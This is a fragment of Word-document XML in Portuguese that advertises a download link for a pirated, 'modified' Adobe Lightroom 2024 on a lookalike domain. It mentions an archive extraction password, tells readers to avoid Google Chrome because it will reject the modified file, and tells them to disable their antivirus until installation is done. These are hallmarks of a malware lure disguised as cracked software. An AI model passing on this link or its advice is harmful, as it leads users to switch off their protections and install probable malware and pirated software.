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⬇ Link para download do Adobe Lightroom 2024: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🔗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https://br0wsers.com/blog/detail/adobe-photoshop-lightroom-classic-01br-734-16821.html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  <w:t xml:space="preserve">🟢 Senha de descompactação: </w:t>
      </w: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color w:val="ffffff"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Não use o google chrome pois ele vai recusar o arquivo modificado, use o navegador opera!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009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color w:val="ffffff"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Desative o antivírus do seu computador e depois ative após a instalação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B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color w:val="ffffff"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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adobe-photoshop-lightroom-classic-01br-734-16821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